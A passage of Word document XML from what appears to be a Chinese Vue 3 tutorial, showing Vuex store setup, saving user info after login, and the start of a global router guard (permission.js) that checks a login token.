          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56536090" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AC46E2" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07282C63" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>export default store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4999B8" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00181907" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223B068D" w14:textId="03E21052" w:rsidR="00BF31AD" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t>.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5F9E85" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D770984" w14:textId="51513858" w:rsidR="00BF31AD" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import store from './store'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB4F2EE" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRPr="00BA2E79" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD87678" w14:textId="0454FDF6" w:rsidR="00BF31AD" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>app.use(store)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D45A38D" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A0166B" w14:textId="02A18F5C" w:rsidR="00BF31AD" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储用户数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F88B134" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0309C8" w14:textId="1B12717F" w:rsidR="00BF31AD" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { useStore } from 'vuex'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B1B18" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRPr="00BA2E79" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188BF2D1" w14:textId="19275C2C" w:rsidR="00BF31AD" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const store = useStore()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEEF818" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRPr="00BA2E79" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="182A499B" w14:textId="7D784C30" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>获取用户相关信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29567782" w14:textId="0B0FD79C" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>getinfo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7533728A" w14:textId="79CF2D0C" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.then(res2 =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE20CD" w14:textId="1C001A1A" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>store.commit("SET_USERINFO", res2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FD3E4E" w14:textId="4AF60AEC" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>console.log(res2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B08517" w14:textId="5C0DD168" w:rsidR="00BF31AD" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EE8B0F" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2159B823" w14:textId="588D5BD4" w:rsidR="00BF31AD" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台首页显示该内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F9C998" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRPr="00BA2E79" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77DFA384" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5990F437" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BFE71C" w14:textId="2EEB8966" w:rsidR="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181223AC" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>{{$store.state.user}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEF32C3" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB78C82" w14:textId="157B1BF0" w:rsidR="00BF31AD" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72962B38" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0604F4F0" w14:textId="13B7D290" w:rsidR="00BF31AD" w:rsidRPr="00181907" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E15A2E0" wp14:editId="757F2200">
            <wp:extent cx="1672783" cy="1976687"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="22665647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56471" name="图片 1" descr="文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId203"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1678776" cy="1983769"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07355CC1" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2534091E" w14:textId="3457F75E" w:rsidR="00BF31AD" w:rsidRDefault="007816B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>课后留一个问题：为什么刷新一下，数据就全没了？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584E95CB" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D57B0A" w14:textId="02A63E98" w:rsidR="00BF31AD" w:rsidRDefault="00EF5F88" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="698" w:name="_Toc159780128"/>
      <w:r w:rsidRPr="00EF5F88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局路由拦截实现登录判断</w:t>
      </w:r>
      <w:bookmarkEnd w:id="698"/>
    </w:p>
    <w:p w14:paraId="6DDE16DB" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1FC2CC" w14:textId="7513DE7F" w:rsidR="00BF31AD" w:rsidRDefault="00622778" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们希望登录成功，才能进后台页面，否则就不允许进入后台页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F8D87" w14:textId="77777777" w:rsidR="00DA7CB8" w:rsidRDefault="00DA7CB8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问的时候，看你有没有这个权限访问某页面，没有权限，就给打回去，有就让你访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5000AF" w14:textId="77777777" w:rsidR="00622778" w:rsidRPr="00DA7CB8" w:rsidRDefault="00622778" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BC5AFA" w14:textId="0B0C5B05" w:rsidR="00622778" w:rsidRDefault="00622778" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00622778">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>此时我们就需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00622778">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>router</w:t>
      </w:r>
      <w:r w:rsidRPr="00622778">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>提供的</w:t>
      </w:r>
      <w:r w:rsidRPr="00622778">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>全局前置守卫</w:t>
      </w:r>
      <w:r w:rsidRPr="00622778">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>来实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6980F408" w14:textId="7AEA467B" w:rsidR="00BF31AD" w:rsidRDefault="00DB2C5A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446732B5" w14:textId="3B81CEDB" w:rsidR="00DA7CB8" w:rsidRDefault="00DB2C5A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB2C5A">
        <w:t>https://router.vuejs.org/zh/guide/advanced/navigation-guards.html#%E5%85%A8%E5%B1%80%E5%89%8D%E7%BD%AE%E5%AE%88%E5%8D%AB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196CFCF5" w14:textId="77777777" w:rsidR="00DA7CB8" w:rsidRDefault="00DA7CB8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0AA448" w14:textId="0D0ACDF7" w:rsidR="00833651" w:rsidRPr="00833651" w:rsidRDefault="00833651" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833651">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>本质上是对</w:t>
      </w:r>
      <w:r w:rsidRPr="00833651">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>router</w:t>
      </w:r>
      <w:r w:rsidRPr="00833651">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的路由设置再次进行了全局路由的阶段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28560FBA" w14:textId="77777777" w:rsidR="00833651" w:rsidRDefault="00833651" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D322FC" w14:textId="6CCAEEB1" w:rsidR="00BF31AD" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:t>permission.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1E15B" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37EC45C7" w14:textId="35C87383" w:rsidR="00790304" w:rsidRPr="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>router</w:t>
      </w:r>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.beforeEach()</w:t>
      </w:r>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的三个参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是结构体，</w:t>
      </w:r>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是一个函数名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2216E5" w14:textId="552B7B86" w:rsidR="00790304" w:rsidRPr="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，就不会让你访问任何网页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB6283C" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A91458" w14:textId="0DA68A69" w:rsidR="00833651" w:rsidRPr="00833651" w:rsidRDefault="00833651" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833651">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>以下要求用户没有登录，必须跳转登录页面；登录后不得重复访问登录页面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB8DB32" w14:textId="77777777" w:rsidR="00833651" w:rsidRPr="00181907" w:rsidRDefault="00833651" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BCB0BE" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import router from "~/router"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D51202" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { getToken } from "~/composables/auth"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2120BE48" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { toast } from "~/composables/util"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003084D6" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6064AD74" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局前置守卫</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115F1F53" w14:textId="77777777" w:rsidR="00790304" w:rsidRPr="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>router.beforeEach((to, from, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09416F66" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    console.log("</w:t>
      </w:r>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>全局前置守卫</w:t>
      </w:r>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5B5108" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0040637F" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const token = getToken()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4135AC78" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
